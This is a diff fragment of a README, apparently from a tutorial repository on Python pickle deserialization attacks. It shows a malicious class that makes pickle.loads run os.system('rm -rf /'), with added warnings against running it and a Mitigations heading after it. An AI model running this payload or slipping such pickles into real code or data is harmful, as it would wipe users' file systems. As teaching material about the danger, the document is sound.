Xiaorui-Huang/pickle_attack/README.md

         return (os.system, ('rm -rf /',)) # 😏💣

 payload = pickle.dumps(MaliciousPickle())
-pickle.loads(payload) # This will execute the payload and the attacker gains control
+pickle.loads(payload) # This will execute the payload and the attacker gains control...
+I MEAN NUKE YOUR WHOLE FILE SYSTEM...
+DO NOT ACTUALLY EXECUTE THIS EXAMPLE
 ```

 ## Mitigations